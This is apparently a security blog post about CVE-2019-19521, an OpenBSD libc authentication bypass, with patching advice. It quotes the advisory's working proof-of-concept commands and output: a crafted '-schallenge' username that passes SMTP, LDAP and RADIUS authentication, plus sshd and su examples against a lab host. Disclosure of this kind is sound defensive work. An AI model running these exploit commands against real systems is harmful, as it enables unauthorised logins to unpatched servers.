tags: libc OpenBSD exploitoftheday

CVE-2019-19521 OpenBSD libc authentication bypass

New authentication bypass vulnerability found in OpenBSD

Firo Solutions OpenBSD

Affecting:

Sometimes Zero days in widely used software is the simpliest thing.

Summary:

An remote authentication vulnerability has been found in
the latest version of OpenBSD which is 6.6,
Due to an insufficient username validation in libc
a remote third party can exploit the login libc function.

Patch it

The OpenBSD developer Reyk Flöte was quick on tweeting out
about this vulnerability.
Reyk openbsd twitter

If you are running OpenBSD
it means its time to run syspatch

# syspatch                                                             
Get/Verify syspatch65-011_expat.tgz 100% |*********|   588 KB    00:02    
Installing patch 011_expat
Get/Verify syspatch65-012_sysupgr... 100% |********| 11482       00:00    
Installing patch 012_sysupgrade
Relinking to create unique kernel... done; reboot to load the new kernel
Errata can be reviewed under /var/syspatch

A patch has been written and published in the latest patch 010_libcauth.patch.

Exploiting the authentication bypass

A report of the vulnerability has been published
on the Bugtraq mailing lists.
The vulnerability can easily be exploited by providing a
username with the flag “-schallenge”
(or “-schallenge:passwd” to force a passwd-style authentication).
The report describes the vulnerability and the affecting parts:

smtpd

/etc/mail/smtpd.conf if authentication is done with just appending “auth” in a rule set
then your system is vulnerable.

The authentication is exploitable:

$ printf '\0-schallenge\0whatever' | openssl base64
AC1zY2hhbGxlbmdlAHdoYXRldmVy

$ openssl s_client -connect 192.168.56.121:25 -starttls smtp
...
EHLO client.example.com
...
AUTH PLAIN AC1zY2hhbGxlbmdlAHdoYXRldmVy
235 2.0.0 Authentication succeeded

ldapd

$ ldapsearch -H ldap://192.168.56.121 -O none -U invaliduser -w whatever
SASL/PLAIN authentication started
ldap_sasl_interactive_bind_s: Invalid credentials (49)

$ ldapsearch -H ldap://192.168.56.121 -O none -U -schallenge -w whatever
SASL/PLAIN authentication started
SASL username: -schallenge
...
# numResponses: 1

radiusd

if bsdauth is enabled in /etc/radiusd.conf:

$ radiusctl test 192.168.56.121 secret -schallenge password whatever
    ...
    Reply-Message             = "Authentication succeeded"

sshd

$ ssh -v -F /dev/null -o PreferredAuthentications=keyboard-interactive \
      -o KbdInteractiveDevices=bsdauth -l -sresponse:passwd 192.168.56.121
...
debug1: Next authentication method: keyboard-interactive

su

$ su -L -- -schallenge
Segmentation fault

External links:
OpenBSD 6.6 errata
CVE-2019-19521
Bugtraq announcement
libc wikipedia
OpenBSD libc patch

Stay up to date with Vulnerability Management and build cool things with our API

This blog post is part of the exploit of the day series
where we write a shorter description about interesting
exploits that we index.